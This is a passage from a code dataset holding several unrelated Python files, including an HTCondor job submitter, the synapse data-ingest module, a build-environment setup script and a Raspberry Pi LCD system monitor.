[]\n\n\ttry:\n\t\tips.append(helper.get_first(discovery.recvfrom(65507)[1]))\n\texcept socket.timeout:\n\t\tprint(wording.get('ip_no').format('XIAOMI YEELIGHT') + wording.get('exclamation_mark'))\n\treturn ips\n","sub_path":"chroma_feedback/consumer/xiaomi_yeelight/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"321760601","text":"import gym\nimport gymfc\nimport numpy as np\nenv=gym.make('AttFC_GyroErr-MotorVel_M4_E-v1')\nenv.render()\nac=np.array([0.1,0.1,0.1,0.1])\nwhile True:\n\tob, reward, done, info = env.step(ac)\n\tprint(reward)\n\tif done:\n\t\tenv.reset()\n\t\t\n\t\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"590579649","text":"f = open(\"num_bags.csv\",\"w\")\r\n\r\n# ask the passenger for the amount of bags they are taking\r\nwhile True:\r\n try:\r\n num_bags = int(input('Number of bags: '))\r\n if num_bags < 0 or num_bags > 2:\r\n raise ValueError\r\n print(num_bags, file=f)\r\n break\r\n except ValueError:\r\n print('Invalid number of bags. You can take up to 2 bags.')\r\n","sub_path":"number_of_bags.py","file_name":"number_of_bags.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"580391644","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport logging\nimport os\nimport subprocess\n\nfrom .util_misc import CockpitSingleton\n\n\nclass ProjectEnv(CockpitSingleton):\n def __init__(self, project_name, out_path=os.path.abspath('..'), debug_level='debug'):\n self.project_name = project_name\n self.debug_level = debug_level\n self.build_root = os.path.abspath('.')\n self.project_root = out_path\n self.project_list_dir = os.path.join(self.build_root, 'projects')\n logging.debug(self.project_list_dir)\n self.project_spec = os.path.join(self.project_list_dir, self.project_name)\n self.out_root = os.path.join(self.project_root, 'out')\n self.project_out = os.path.join(self.out_root, self.project_name)\n logging.debug(self.project_out)\n self.project_conf_out = os.path.join(self.project_out, 'configs')\n\n def setup(self):\n os.makedirs(self.project_root, exist_ok=True)\n os.makedirs(self.out_root, exist_ok=True)\n os.makedirs(self.project_out, exist_ok=True)\n\n env_setup_path = os.path.join(self.project_out, 'envsetup.sh')\n logging.debug(env_setup_path)\n if os.path.exists(env_setup_path):\n os.remove(env_setup_path)\n\n os.makedirs(self.project_out, exist_ok=True)\n with open(env_setup_path, 'a+') as es:\n es.write(\"#!/usr/bin/sh \\n\\n\")\n es.write(\"export PROJECT_DEBUG_LEVEL=\" + self.debug_level + \"\\n\")\n es.write(\"export PROJECT_NAME=\" + self.project_name + \"\\n\")\n es.write(\"export PROJECT_ROOT=\" + self.project_root + \"\\n\")\n es.write(\"export BUILD_ROOT=\" + self.build_root + \"\\n\")\n es.write(\"export PROJECT_CONF=\" + self.project_list_dir + \"\\n\")\n es.write(\"export OUT_ROOT=\" + self.out_root + \"\\n\")\n es.write(\"export PROJECT_OUT_ROOT=\" + self.project_out + \"\\n\")\n es.write(\"export PROJECT_CONF_OUT=\" + self.project_conf_out + \"\\n\")\n\n env_setup_path = os.path.join(self.project_out, 'envsetup.sh')\n cmd = \"cat {}\".format(env_setup_path)\n ret, output = subprocess.getstatusoutput(cmd)\n logging.info(output)\n","sub_path":"project/cockpit_build/utils/project_env.py","file_name":"project_env.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549500248","text":"import os\nimport re\nimport csv\nimport json\nimport codecs\nimport logging\nimport traceback\n\nimport xml.etree.ElementTree as x_etree\n\nfrom synapse.common import *\nfrom synapse.eventbus import EventBus\n\nimport synapse.axon as s_axon\nimport synapse.gene as s_gene\nimport synapse.compat as s_compat\nimport synapse.dyndeps as s_dyndeps\n\nimport synapse.lib.scope as s_scope\nimport synapse.lib.syntax as s_syntax\nimport synapse.lib.scrape as s_scrape\nimport synapse.lib.datapath as s_datapath\nimport synapse.lib.encoding as s_encoding\nimport synapse.lib.filepath as s_filepath\nimport synapse.lib.openfile as s_openfile\n\nlogger = logging.getLogger(__name__)\n\ndef _xml_stripns(e):\n\n # believe it or not, this is the recommended\n # way to strip XML namespaces...\n if e.tag.find('}') != -1:\n e.tag = e.tag.split('}')[1]\n\n for name,valu in e.attrib.items():\n if name.find('}') != -1:\n e.attrib[name.split('{')[1]] = valu\n\n for x in e:\n _xml_stripns(x)\n\n\ndef _fmt_xml(fd,gest):\n #TODO stream XML ingest for huge files\n elem = x_etree.fromstring(fd.read())\n _xml_stripns(elem)\n yield {elem.tag:elem}\n\ndef _fmt_csv(fd,gest):\n\n opts = {}\n\n quot = gest.get('format:csv:quote')\n cmnt = gest.get('format:csv:comment')\n dial = gest.get('format:csv:dialect')\n delm = gest.get('format:csv:delimiter')\n\n if dial != None:\n opts['dialect'] = dial\n\n if delm != None:\n opts['delimiter'] = delm\n\n if quot != None:\n opts['quotechar'] = quot\n\n # do we need to strip a comment char?\n if cmnt != None:\n\n # use this if we need to strip comments\n # (but avoid it otherwise for perf )\n def lineiter():\n for line in fd:\n if not line.startswith(cmnt):\n yield line\n\n return csv.reader(lineiter(),**opts)\n\n return csv.reader(fd,**opts)\n\ndef _fmt_lines(fd,gest):\n\n skipre = None\n mustre = None\n\n lowr = gest.get('format:lines:lower')\n cmnt = gest.get('format:lines:comment','#')\n\n skipstr = gest.get('format:lines:skipre')\n if skipstr != None:\n skipre = re.compile(skipstr)\n\n muststr = gest.get('format:lines:mustre')\n if muststr != None:\n mustre = re.compile(muststr)\n\n for line in fd:\n\n line = line.strip()\n\n if not line:\n continue\n\n if line.startswith(cmnt):\n continue\n\n if lowr:\n line = line.lower()\n\n if skipre != None and skipre.match(line) != None:\n continue\n\n if mustre != None and mustre.match(line) == None:\n continue\n\n yield line\n\ndef _fmt_json(fd,info):\n yield json.loads( fd.read() )\n\ndef _fmt_jsonl(fd,info):\n for line in fd:\n yield json.loads(line)\n\nfmtyielders = {\n 'csv':_fmt_csv,\n 'xml':_fmt_xml,\n 'json':_fmt_json,\n 'jsonl':_fmt_jsonl,\n 'lines':_fmt_lines,\n}\n\nfmtopts = {\n 'xml':{'mode':'r','encoding':'utf8'},\n 'csv':{'mode':'r','encoding':'utf8'},\n 'json':{'mode':'r','encoding':'utf8'},\n 'jsonl':{'mode':'r','encoding':'utf8'},\n 'lines':{'mode':'r','encoding':'utf8'},\n}\n\ndef addFormat(name, fn, opts):\n '''\n Add an additional ingest file format\n '''\n fmtyielders[name] = fn\n fmtopts[name] = opts\n\ndef iterdata(fd,**opts):\n '''\n Iterate through the data provided by a file like object.\n\n Optional parameters may be used to control how the data\n is deserialized.\n\n Example:\n\n with open('foo.csv','rb') as fd:\n\n for row in iterdata(fd, format='csv', encoding='utf8'):\n\n dostuff(row)\n\n '''\n fmt = opts.get('format','lines')\n fopts = fmtopts.get(fmt,{})\n\n # set default options for format\n for opt,val in fopts.items():\n opts.setdefault(opt,val)\n\n ncod = opts.get('encoding')\n if ncod != None:\n fd = codecs.getreader(ncod)(fd)\n\n fmtr = fmtyielders.get(fmt)\n if fmtr == None:\n raise NoSuchImpl(name=fmt,knowns=fmtyielders.keys())\n\n for item in fmtr(fd,opts):\n yield item\n\n fd.close()\n\nclass Ingest(EventBus):\n '''\n An Ingest allows modular data acquisition and cortex loading.\n '''\n def __init__(self, info, axon=None):\n EventBus.__init__(self)\n self._i_res = {}\n self._i_info = info\n self._i_axon = axon\n\n self._i_glab = s_gene.GeneLab()\n\n self._tvar_cache = {}\n self._tvar_regex = re.compile('{{(\\w+)}}')\n\n def _re_compile(self, regex):\n ret = self._i_res.get(regex)\n if ret == None:\n self._i_res[regex] = ret = re.compile(regex)\n return ret\n\n def get(self, name, defval=None):\n return self._i_info.get(name,defval)\n\n def set(self, name, valu):\n self._i_info[name] = valu\n\n def _iterDataSorc(self, path, info):\n\n if not os.path.isabs(path):\n basedir = self.get('basedir')\n if basedir:\n path = os.path.join(basedir,path)\n\n onfo = info.get('open')\n for fd in s_filepath.openfiles(path,mode='rb'):\n yield iterdata(fd,**onfo)\n\n def ingest(self, core, data=None):\n '''\n Ingest the data from this definition into the specified cortex.\n '''\n scope = s_scope.Scope()\n if data != None:\n root = s_datapath.initelem(data)\n gest = self._i_info.get('ingest')\n self._ingDataInfo(core, root, gest, scope)\n return\n\n for path,info in self.get('sources'):\n\n scope.enter()\n\n scope.add('tags', *info.get('tags',()) )\n\n gest = info.get('ingest')\n if gest == None:\n gest = self._i_info.get('ingest')\n\n if gest == None:\n raise Exception('Ingest Info Not Found: %s' % (path,))\n\n for datasorc in self._iterDataSorc(path,info):\n for data in datasorc:\n root = s_datapath.initelem(data)\n self._ingDataInfo(core, root, gest, scope)\n\n def _ingMergScope(self, core, data, info, scope):\n\n vard = info.get('vars')\n if vard != None:\n for varn,vnfo in vard:\n valu = self._get_prop(core,data,vnfo,scope)\n scope.set(varn,valu)\n\n for tagv in info.get('tags',()):\n\n # if it's a simple tag string, add and move along\n if s_compat.isstr(tagv):\n scope.add('tags',tagv.lower())\n continue\n\n # otherwise it's an iteration compatible prop dict\n tags = [ t.lower() for t in self._iter_prop(core,data,tagv,scope) ]\n\n scope.add('tags',*tags)\n\n def _ingFileInfo(self, core, data, info, scope):\n\n with scope:\n\n self._ingMergScope(core,data,info,scope)\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n path = info.get('path')\n\n byts = data.valu(path)\n\n dcod = info.get('decode')\n if dcod != None:\n byts = s_encoding.decode(dcod,byts)\n\n hset = s_axon.HashSet()\n hset.update(byts)\n\n iden,props = hset.guid()\n\n mime = info.get('mime')\n if mime != None:\n props['mime'] = mime\n\n tufo = core.formTufoByProp('file:bytes',iden,**props)\n\n self.fire('gest:prog', act='file')\n\n for tag in scope.iter('tags'):\n core.addTufoTag(tufo,tag)\n self.fire('gest:prog', act='tag')\n\n def _ingFormInfo(self, core, data, info, scope):\n\n with scope:\n\n try:\n\n form = info.get('form')\n self._ingMergScope(core,data,info,scope)\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n valu = self._get_prop(core,data,info,scope)\n if valu == None:\n return\n\n tufo = core.formTufoByFrob(form,valu)\n if tufo == None:\n return\n\n self.fire('gest:prog', act='form')\n\n props = {}\n for prop,pnfo in info.get('props',{}).items():\n valu = self._get_prop(core,data,pnfo,scope)\n if valu == None:\n continue\n\n props[prop] = valu\n\n if props:\n core.setTufoFrobs(tufo,**props)\n self.fire('gest:prog', act='set')\n\n for tag in scope.iter('tags'):\n core.addTufoTag(tufo,tag)\n self.fire('gest:prog', act='tag')\n\n except Exception as e:\n traceback.print_exc()\n core.logCoreExc(e,subsys='ingest')\n\n def _ingDataInfo(self, core, data, info, scope):\n\n with scope:\n\n self._ingMergScope(core,data,info,scope)\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n self.fire('gest:prog', act='data')\n\n # extract files embedded within the data structure\n for flfo in info.get('files',()):\n self._ingFileInfo(core,data,flfo,scope)\n\n for cond,cnfo in info.get('conds',()):\n if not self._isCondTrue(cond,scope):\n continue\n self._ingDataInfo(core,data,cnfo,scope)\n\n # iterate and create any forms at our level\n for form,fnfo in info.get('forms',()):\n fnfo.setdefault('form',form)\n self._ingFormInfo(core,data,fnfo,scope)\n\n # handle explicit nested iterators\n for path,tifo in info.get('iters',()):\n for base in data.iter(path):\n self._ingDataInfo(core, base, tifo, scope)\n\n def _isCondTrue(self, cond, scope):\n expr = self._i_glab.getGeneExpr(cond)\n return bool( expr( scope ) )\n\n def _iter_prop(self, core, data, info, scope):\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n path = info.get('iter')\n\n if path == None:\n\n valu = self._get_prop(core, data, info, scope)\n if valu != None:\n yield valu\n\n return\n\n for base in data.iter(path):\n\n with scope:\n\n self._ingMergScope(core,base,info,scope)\n valu = self._get_prop(core, base, info, scope)\n if valu == None:\n continue\n\n yield valu\n\n def _getTmplVars(self, text):\n ret = self._tvar_cache.get(text)\n if ret == None:\n self._tvar_cache[text] = ret = self._tvar_regex.findall(text)\n return ret\n\n def _get_prop(self, core, base, info, scope):\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n valu = info.get('value')\n if valu != None:\n return valu\n\n if valu == None:\n varn = info.get('var')\n valu = scope.get(varn)\n\n template = info.get('template')\n if template != None:\n\n valu = template\n\n for tvar in self._getTmplVars(template):\n tval = scope.get(tvar)\n if tval == None:\n return None\n\n # FIXME optimize away the following format string\n valu = valu.replace('{{%s}}' % tvar, tval)\n\n if valu == None:\n path = info.get('path')\n valu = base.valu(path)\n\n if valu == None:\n return None\n\n # If we have a regex field, use it to extract valu from the\n # first grouping\n rexs = info.get('regex')\n if rexs != None:\n rexo = self._re_compile(rexs)\n match = rexo.search(valu)\n if match == None:\n return None\n\n groups = match.groups()\n if groups:\n valu = groups[0]\n\n # allow type based normalization here\n cast = info.get('cast')\n if cast != None:\n valu = core.getTypeCast(cast,valu)\n\n # FIXME make a mechanism here for field translation based\n # on an included translation table within the ingest def\n\n pivot = info.get('pivot')\n if pivot != None:\n pivf,pivt = pivot\n\n pivo = core.getTufoByFrob(pivf,valu)\n if pivo == None:\n return None\n\n valu = pivo[1].get(pivt)\n\n return valu\n\ndef loadfile(*paths):\n '''\n Load a json ingest def from file and construct an Ingest class.\n\n This routine is useful because it implements the convention\n for adding runtime info to the ingest json to facilitate path\n relative file opening etc...\n '''\n path = genpath(*paths)\n\n # FIXME universal open\n\n with reqfile(path) as fd:\n jsfo = json.loads( fd.read().decode('utf8') )\n\n gest = Ingest(jsfo)\n\n gest.set('basedir', os.path.dirname(path))\n\n return gest\n","sub_path":"synapse/lib/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":13164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"82735317","text":"import socket\nimport time\n\nimport imp\nconfig = imp.load_source('config', \"..\\\\config.py\")\ndata_manager = imp.load_source('data_manager', \"..\\\\Storage\\\\Storage.py\")\n\ndef create_connect():\n\tprint (config.SERVER, config.PORT)\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((config.SERVER, config.PORT))\n\treturn s\n\ndef Sent_to_host(data):\n\tsocket_name = create_connect()\n\tsocket_name.sendall(data)\n\tsocket_name.close()\n\tdat = data_manager.data_manager()\n\tdat.sent_Host(data)\n\ndef sendToHost(filename, socket_name):\n\tf = open(filename)\n\t#print f.readline()\n\tchuoi = f.readline()\n\twhile chuoi != '':\n\t\tsocket_name.sendall(chuoi)\n\t\tprint \n\t\ttime.sleep(2)\n\t\tchuoi = f.readline()\n\tf.close()\n\tsocket_name.close()\n\n#s = create_connect('localhost',3129)\nSent_to_host(\"hello\")\n#sendToHost(\"D:\\\\demo.txt\", s)\n","sub_path":"Send to Host/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370273684","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'content'\nurlpatterns = [\n path('', views.index, name='index'),\n path('start/', views.starting_point, name='starting_point'),\n path('mybelts/', views.UserBeltPage.as_view(), name='my-belts'),\n path('start/myquestions/', views.MyQuestions.as_view(), name='my-questions'),\n\n\n]\n\nurlpatterns += [\n\n]","sub_path":"backend/content/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156128552","text":"import math\nimport utils\n\n\ndef cosine_similarity(vec1, vec2):\n\n utils.check_for_none(vec1, vec2)\n utils.check_for_type(list, vec1, vec2)\n\n v_x_y, v_x_2, v_y_2 = 0.0, 0.0, 0.0\n for v1, v2 in zip(vec1, vec2): # list of int / float\n v_x_y += v1 * v2\n v_x_2 += v1 * v1\n v_y_2 += v2 * v2\n\n return 0.0 if v_x_y == 0 else v_x_y / (math.sqrt(v_x_2) * math.sqrt(v_y_2))\n","sub_path":"rltk/similarity/cosine.py","file_name":"cosine.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242745600","text":"#!/usr/bin/env python\n# Tai Sakuma \nimport os, sys\nimport subprocess\nimport collections\nimport time\nimport textwrap\nimport getpass\nimport re\nimport logging\n\nimport alphatwirl\nfrom alphatwirl.misc.deprecation import _deprecated_class_method_option\n\nfrom .exec_util import try_executing_until_succeed, compose_shortened_command_for_logging\n\n##__________________________________________________________________||\n# https://htcondor-wiki.cs.wisc.edu/index.cgi/wiki?p=MagicNumbers\nHTCONDOR_JOBSTATUS = {\n 0: \"Unexpanded\",\n 1: \"Idle\",\n 2: \"Running\",\n 3: \"Removed\",\n 4: \"Completed\",\n 5: \"Held\",\n 6: \"Transferring_Output\",\n 7: \"Suspended\"\n}\n\n##__________________________________________________________________||\n## HTCondor Manual:\n## 2.5 Submitting a Job\n## http://research.cs.wisc.edu/htcondor/manual/v8.4/2_5Submitting_Job.html\n##\n## condor_submit command manual\n## including complete description of submit description file\n## http://research.cs.wisc.edu/htcondor/manual/v8.4/condor_submit.html#man-condor-submit\n\n## keys should be in lower case in this dict\nDEFAULT_JOB_DESC_DICT = collections.OrderedDict([\n ('executable', 'run.py'),\n ('output', 'results/$(resultdir)/stdout.$(cluster).$(process).txt'),\n ('error', 'results/$(resultdir)/stderr.$(cluster).$(process).txt'),\n ('log', 'results/$(resultdir)/log.$(cluster).$(process).txt'),\n ('arguments', '$(resultdir).p.gz'),\n ('should_transfer_files', 'YES'),\n ('when_to_transfer_output', 'ON_EXIT'),\n ('transfer_input_files', '$(resultdir).p.gz'),\n ('transfer_output_files', 'results'),\n ('universe', 'vanilla'),\n ('notification', 'Error'),\n ('getenv', 'True'),\n])\n\n##__________________________________________________________________||\nclass HTCondorJobSubmitter(object):\n\n @_deprecated_class_method_option('job_desc_extra', msg='use job_desc_dict instead')\n def __init__(self, job_desc_extra=[ ], job_desc_dict={}):\n\n self.job_desc_dict = DEFAULT_JOB_DESC_DICT.copy()\n for k, v in job_desc_dict.items():\n self.job_desc_dict[k.lower()] = v # not using update() in case\n # job_desc_dict is ordered\n\n self.user_job_desc_dict = job_desc_dict # for test\n\n self.job_desc_extra = job_desc_extra # TODO: to be deleted\n\n self.clusterprocids_outstanding = [ ]\n self.clusterprocids_finished = [ ]\n\n def run(self, workingArea, package_index):\n return self.run_multiple(workingArea, [package_index])[0]\n\n def run_multiple(self, workingArea, package_indices):\n\n if not package_indices:\n return [ ]\n\n cwd = os.getcwd()\n os.chdir(workingArea.path)\n\n package_paths = [workingArea.package_path(i) for i in package_indices]\n resultdir_basenames = [os.path.splitext(p)[0] for p in package_paths]\n resultdir_basenames = [os.path.splitext(n)[0] for n in resultdir_basenames]\n resultdirs = [os.path.join('results', n) for n in resultdir_basenames]\n\n for d in resultdirs:\n alphatwirl.mkdir_p(d)\n\n self.job_desc_dict['executable'] = workingArea.executable\n\n extra_input_files = sorted(list(workingArea.extra_input_files))\n if extra_input_files:\n self.job_desc_dict['transfer_input_files'] += ', ' + ', '.join(extra_input_files)\n\n job_desc = '\\n'.join(['{} = {}'.format(k, v) for k, v in self.job_desc_dict.items()])\n job_desc_queue_line = 'queue resultdir in {}'.format(', '.join(resultdir_basenames))\n\n # TODO: delete this line as job_desc_extra will be obsolete\n job_desc = '\\n'.join([job_desc] + self.job_desc_extra)\n\n job_desc = '\\n'.join([job_desc, job_desc_queue_line])\n\n procargs = ['condor_submit']\n\n logger = logging.getLogger(__name__)\n command_display = compose_shortened_command_for_logging(procargs)\n logger.debug('execute: {!r}'.format(command_display))\n\n proc = subprocess.Popen(\n procargs,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n\n stdout, stderr = proc.communicate(job_desc)\n stdout = stdout.decode()\n stderr = stderr.decode()\n\n for l in stdout.rstrip().split('\\n'):\n logger.debug(l)\n\n regex = re.compile(\"(\\d+) job\\(s\\) submitted to cluster (\\d+)\", re.MULTILINE)\n njobs = int(regex.search(stdout).groups()[0])\n clusterid = regex.search(stdout).groups()[1]\n # e.g., '3158626'\n\n change_job_priority([clusterid], 10) ## need to make configurable\n\n procid = ['{}'.format(i) for i in range(njobs)]\n # e.g., ['0', '1', '2', '3']\n\n clusterprocids = ['{}.{}'.format(clusterid, i) for i in procid]\n # e.g., ['3158626.0', '3158626.1', '3158626.2', '3158626.3']\n\n self.clusterprocids_outstanding.extend(clusterprocids)\n\n os.chdir(cwd)\n\n return clusterprocids\n\n def poll(self):\n \"\"\"check if the jobs are running and return a list of cluster IDs for\n finished jobs\n\n \"\"\"\n\n clusterids = clusterprocids2clusterids(self.clusterprocids_outstanding)\n clusterprocid_status_list = query_status_for(clusterids)\n # e.g., [['1730126.0', 2], ['1730127.0', 2], ['1730129.1', 1], ['1730130.0', 1]]\n\n\n if clusterprocid_status_list:\n clusterprocids, statuses = zip(*clusterprocid_status_list)\n else:\n clusterprocids, statuses = (), ()\n\n clusterprocids_finished = [i for i in self.clusterprocids_outstanding if i not in clusterprocids]\n self.clusterprocids_finished.extend(clusterprocids_finished)\n self.clusterprocids_outstanding[:] = clusterprocids\n\n # logging\n counter = collections.Counter(statuses)\n messages = [ ]\n if counter:\n messages.append(', '.join(['{}: {}'.format(HTCONDOR_JOBSTATUS[k], counter[k]) for k in counter.keys()]))\n if self.clusterprocids_finished:\n messages.append('Finished {}'.format(len(self.clusterprocids_finished)))\n logger = logging.getLogger(__name__)\n logger.info(', '.join(messages))\n\n return clusterprocids_finished\n\n def wait(self):\n \"\"\"wait until all jobs finish and return a list of cluster IDs\n \"\"\"\n sleep = 5\n while self.clusterprocids_outstanding:\n self.poll()\n time.sleep(sleep)\n return self.clusterprocids_finished\n\n def failed_runids(self, runids):\n # remove failed clusterprocids from self.clusterprocids_finished\n # so that len(self.clusterprocids_finished)) becomes the number\n # of the successfully finished jobs\n for i in runids:\n try:\n self.clusterprocids_finished.remove(i)\n except ValueError:\n pass\n\n def terminate(self):\n clusterids = clusterprocids2clusterids(self.clusterprocids_outstanding)\n ids_split = split_ids(clusterids)\n statuses = [ ]\n for ids_sub in ids_split:\n procargs = ['condor_rm'] + ids_sub\n command_display = compose_shortened_command_for_logging(procargs)\n logger = logging.getLogger(__name__)\n logger.debug('execute: {}'.format(command_display))\n proc = subprocess.Popen(\n procargs,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n stdout, stderr = proc.communicate()\n\n##__________________________________________________________________||\ndef clusterprocids2clusterids(clusterprocids):\n return list(set([i.split('.')[0] for i in clusterprocids]))\n\n##__________________________________________________________________||\ndef query_status_for(ids, n_at_a_time=500):\n\n ids_split = split_ids(ids, n=n_at_a_time)\n stdout = [ ]\n for ids_sub in ids_split:\n procargs = ['condor_q'] + ids_sub + ['-format', '%d.', 'ClusterId', '-format', '%d ', 'ProcId', '-format', '%-2s\\n', 'JobStatus']\n stdout.extend(try_executing_until_succeed(procargs))\n\n # e.g., stdout = ['688244.0 1 ', '688245.0 1 ', '688246.0 2 ']\n\n ret = [l.strip().split() for l in stdout]\n # e.g., [['688244.0', '1'], ['688245.0', '1'], ['688246.0', '2']]\n\n ret = [[e[0], int(e[1])] for e in ret]\n # a list of [clusterprocid, status]\n # e.g., [['688244.0', 1], ['688245.0', 1], ['688246.0', 2]]\n\n return ret\n\n##__________________________________________________________________||\ndef change_job_priority(ids, priority=10, n_at_a_time=500):\n\n # http://research.cs.wisc.edu/htcondor/manual/v7.8/2_6Managing_Job.html#sec:job-prio\n\n ids_split = split_ids(ids, n=n_at_a_time)\n for ids_sub in ids_split:\n procargs = ['condor_prio', '-p', str(priority)] + ids_sub\n try_executing_until_succeed(procargs)\n\n##__________________________________________________________________||\ndef split_ids(ids, n=500):\n # e.g.,\n # ids = [3158174', '3158175', '3158176', '3158177', '3158178']\n # n = 2\n # return [[3158174', '3158175'], ['3158176', '3158177'], ['3158178']]\n return [ids[i:(i + n)] for i in range(0, len(ids), n)]\n\n##__________________________________________________________________||\n","sub_path":"alphatwirl/concurrently/HTCondorJobSubmitter.py","file_name":"HTCondorJobSubmitter.py","file_ext":"py","file_size_in_byte":9266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"9365835","text":"#!/usr/bin/env python\n\n# https://gist.github.com/transilluminate/bbc1eca2739badaadf58\n\nimport time, colorsys, psutil, subprocess\nimport dot3k.lcd as lcd\nimport dot3k.backlight as backlight\nfrom dot3k.menu import Menu, MenuOption\n\ndef run_cmd(cmd):\n\tp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\toutput = p.communicate()[0].rstrip()\n\treturn output\n\ndef millis():\n\treturn int(round(time.time() * 1000.0))\n\ndef lcd_colour(percent):\n\tf = float(percent) / 100\n\t# there's a good colour change between these hues on a dot3k *RBG* display:\n\tstart = 270\n\tend = 330\n\tstep = end - start\n\thue = (start + (f * step)) / 360\n\tbacklight.hue(hue)\n\ndef bytes2human(n):\n\t# http://code.activestate.com/recipes/578019\n\tsymbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')\n\tprefix = {}\n\tfor i, s in enumerate(symbols):\n\t\tprefix[s] = 1 << (i + 1) * 10\n\tfor s in reversed(symbols):\n\t\tif n >= prefix[s]:\n\t\t\tvalue = float(n) / prefix[s]\n\t\t\treturn '%.0f%s' % (value, s)\n\t\t\treturn \"%sB\" % n\n\nclass cpu_info(MenuOption):\n\t\n\tdef begin(self):\n\t\tself.load_average_5m = run_cmd(\"uptime | grep -ohe 'load average[s:][: ].*' | awk '{ print $4 }'| tr -d ','\")\n\t\n\tdef get_cpu_temp(self):\n\t\ttempFile = open(\"/sys/class/thermal/thermal_zone0/temp\")\n\t\tcpu_temp = tempFile.read()\n\t\ttempFile.close()\n\t\treturn int(cpu_temp) / 1000\n\t\t\n\tdef redraw(self,menu):\n\t\tcpu_percent = psutil.cpu_percent(interval=0)\n\t\tcpu_temp = self.get_cpu_temp()\n\t\t\n\t\tlcd_colour(cpu_percent)\n\t\tmenu.write_row(0,'-= CPU =-')\n\t\tmenu.write_row(1,'Load: %.0f%% (%s)' % (cpu_percent, self.load_average_5m))\n\t\tmenu.write_row(2,'Temp: %s C' % str(cpu_temp))\n\nclass memory_info(MenuOption):\n\t\n\tdef redraw(self,menu):\n\t\tavailable_memory = bytes2human(psutil.virtual_memory().available)\n\t\tactive_memory = bytes2human(psutil.virtual_memory().active)\n\t\tpercent_used = psutil.virtual_memory().percent\n\t\tpercent_free = 100 - percent_used\n\t\t\n\t\tlcd_colour(percent_used)\n\t\tmenu.write_row(0,'-= RAM =-')\n\t\tmenu.write_row(1,'Used: %s (%.0f%%)' % (active_memory, percent_used))\n\t\tmenu.write_row(2,'Free: %s (%.0f%%)' % (available_memory, percent_free))\n\nclass disk_info(MenuOption):\n\t\n\tdef redraw(self,menu):\n\t\tpercent_used_root = psutil.disk_usage('/').percent\n\t\tpercent_used_usb = psutil.disk_usage('/mnt/SandiskUSB').percent\n\t\t\n\t\tlcd_colour(percent_used_root)\n\t\tmenu.write_row(0,'-= HDD =-')\n\t\tmenu.write_row(1,'Used (/): %.0f%%' % percent_used_root)\n\t\tmenu.write_row(2,'Used (USB): %.0f%%' % percent_used_usb)\n\nclass network_info(MenuOption):\n\t\n\tdef __init__(self,interface):\n\t\tself.interface = interface\n\t\tMenuOption.__init__(self)\n\t\n\tdef begin(self):\n\t\tself.ip_address = run_cmd(\"ifconfig \" + self.interface + \" | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'\")\n\t\tself.ping = run_cmd(\"ping -c 1 -I \" + self.interface + \" 8.8.8.8 | grep time= | awk '{ print $7 }' | cut -d'=' -f2\")\n\t\t\n\t\tif not self.ip_address:\n\t\t\tself.ip_address = 'No IP address!' \n\t\t\n\t\ttry:\n\t\t\tself.ping = float(self.ping)\n\t\texcept:\n\t\t\tpass\n\t\t\n\t\t# define screen colours based on ping values, arbitrarily: 0-20=good, 20-40=ok, 40-100=hmm, >100=crap\n\t\tif 0 <= self.ping < 20:\n\t\t\tself.colour = 0\n\t\telif 20 <= self.ping < 40:\n\t\t\tself.colour = 25\n\t\telif 40 <= self.ping < 100:\n\t\t\tself.colour = 50\n\t\telif self.ping <= 100:\n\t\t\tself.colour = 75\n\t\telse:\n\t\t\tself.colour = 100\t\t# unreachable\n\t\t\tself.ping = ';-( '\t# padd the 'ms' off the screen\n\t\t\t\n\t\t#self.connections = run_cmd(\"netstat -tun | grep -c ESTABLISHED\")\n\t\t#self.mac_address = run_cmd(\"ifconfig \" + self.interface + \" | grep HWaddr | awk '{ print $5 }' | sed s/://g\") \n\t\t\n\tdef redraw(self,menu):\n\t\tlcd_colour(self.colour)\n\t\tmenu.write_row(0,'-= ' + self.interface + ' =-')\n\t\tmenu.write_row(1,'%s' % self.ip_address) # xxx.xxx.xxx.xxx = 15 chars max\n\t\tmenu.write_row(2,'Ping: %s ms' % self.ping)\n\t\t#menu.write_row(2,'%s' % self.mac_address) # xx:xx:xx:xx:xx:xx (17 chars, have to remove ':')\n\t\t#menu.write_row(2,'%s connections' % self.connections)\n\nclass network_speed(MenuOption):\n\t\n\tdef 